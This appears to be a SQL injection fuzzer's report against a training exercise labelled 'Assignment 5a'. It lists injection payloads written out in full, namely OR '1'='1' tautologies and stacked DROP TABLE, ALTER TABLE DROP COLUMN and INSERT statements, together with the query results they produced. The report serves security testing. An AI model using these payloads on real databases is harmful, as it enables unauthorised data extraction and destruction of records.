FUZZER REPORT : 


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type exfiltration
Original query: Smith
Tainted query: SmithSmith1' OR '1'='1' -- 
Legit result: [{"USERID": "37648", "FIRST_NAME": "37648", "LAST_NAME": "John", "DEPARTMENT": "Smith"}]
Tainted result: [{"USERID": "32147", "FIRST_NAME": "32147", "LAST_NAME": "Paulina", "DEPARTMENT": "Travers"}]


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type exfiltration
Original query: 3SL99A
Tainted query: 3SL99A3SL99A1' OR '1'='1
Legit result: [{"USERID": "37648", "FIRST_NAME": "37648", "LAST_NAME": "John", "DEPARTMENT": "Smith"}]
Tainted result: [{"USERID": "32147", "FIRST_NAME": "32147", "LAST_NAME": "Paulina", "DEPARTMENT": "Travers"}]


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type exfiltration
Original query: 3SL99A
Tainted query: 3SL99A3SL99A1' OR '1'='1' -- 
Legit result: [{"USERID": "37648", "FIRST_NAME": "37648", "LAST_NAME": "John", "DEPARTMENT": "Smith"}]
Tainted result: [{"USERID": "32147", "FIRST_NAME": "32147", "LAST_NAME": "Paulina", "DEPARTMENT": "Travers"}]


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type exfiltration
Original query: 3SL99A
Tainted query: 3SL99A3SL99A' OR ''='
Legit result: [{"USERID": "37648", "FIRST_NAME": "37648", "LAST_NAME": "John", "DEPARTMENT": "Smith"}]
Tainted result: [{"USERID": "32147", "FIRST_NAME": "32147", "LAST_NAME": "Paulina", "DEPARTMENT": "Travers"}]


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: Smith
Tainted query: SmithSmith'; DROP TABLE employees;--
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: Smith
Tainted query: SmithSmith'; ALTER TABLE employees ADD COLUMN hacked_text_column TEXT; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: Smith
Tainted query: SmithSmith'; ALTER TABLE employees ADD COLUMN hacked_int_column INT; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: Smith
Tainted query: SmithSmith'; INSERT INTO employees (userid,first_name,last_name,department,salary,auth_tan) VALUES (1,hack_string,hack_string,hack_string,1,hack_string); --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: Smith
Tainted query: SmithSmith'; ALTER TABLE employees DROP COLUMN userid; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: Smith
Tainted query: SmithSmith'; ALTER TABLE employees DROP COLUMN first_name; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: Smith
Tainted query: SmithSmith'; ALTER TABLE employees DROP COLUMN last_name; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: Smith
Tainted query: SmithSmith'; ALTER TABLE employees DROP COLUMN department; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: Smith
Tainted query: SmithSmith'; ALTER TABLE employees DROP COLUMN salary; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: Smith
Tainted query: SmithSmith'; ALTER TABLE employees DROP COLUMN auth_tan; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: 3SL99A
Tainted query: 3SL99A3SL99A'; DROP TABLE employees;--
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: 3SL99A
Tainted query: 3SL99A3SL99A'; ALTER TABLE employees ADD COLUMN hacked_text_column TEXT; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: 3SL99A
Tainted query: 3SL99A3SL99A'; ALTER TABLE employees ADD COLUMN hacked_int_column INT; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: 3SL99A
Tainted query: 3SL99A3SL99A'; INSERT INTO employees (userid,first_name,last_name,department,salary,auth_tan) VALUES (1,hack_string,hack_string,hack_string,1,hack_string); --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: 3SL99A
Tainted query: 3SL99A3SL99A'; ALTER TABLE employees DROP COLUMN userid; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: 3SL99A
Tainted query: 3SL99A3SL99A'; ALTER TABLE employees DROP COLUMN first_name; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: 3SL99A
Tainted query: 3SL99A3SL99A'; ALTER TABLE employees DROP COLUMN last_name; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: 3SL99A
Tainted query: 3SL99A3SL99A'; ALTER TABLE employees DROP COLUMN department; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: 3SL99A
Tainted query: 3SL99A3SL99A'; ALTER TABLE employees DROP COLUMN salary; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES


Potential SQL Injection found in Assignment 5a parameter string with fuzzing type corruption
Original query: 3SL99A
Tainted query: 3SL99A3SL99A'; ALTER TABLE employees DROP COLUMN auth_tan; --
Legit result: [{"USERID":"32147","FIRST_NAME":"Paulina","LAST_NAME":"Travers","DEPARTMENT":"Accounting","SALARY":"46000.00","AUTH_TAN":"P45JSI"},{"USERID":"34477","FIRST_NAME":"Abraham","LAST_NAME":"Holman","DEPARTMENT":"Development","SALARY":"50000.00","AUTH_TAN":"UU2ALK"},{"USERID":"37648","FIRST_NAME":"John","LAST_NAME":"Smith","DEPARTMENT":"Marketing","SALARY":"64350.00","AUTH_TAN":"3SL99A"},{"USERID":"89762","FIRST_NAME":"Tobi","LAST_NAME":"Barnett","DEPARTMENT":"Development","SALARY":"77000.00","AUTH_TAN":"TA9LL1"},{"USERID":"96134","FIRST_NAME":"Bob","LAST_NAME":"Franco","DEPARTMENT":"Marketing","SALARY":"83700.00","AUTH_TAN":"LO9S2V"}]
Tainted result: user lacks privilege or object not found: EMPLOYEES
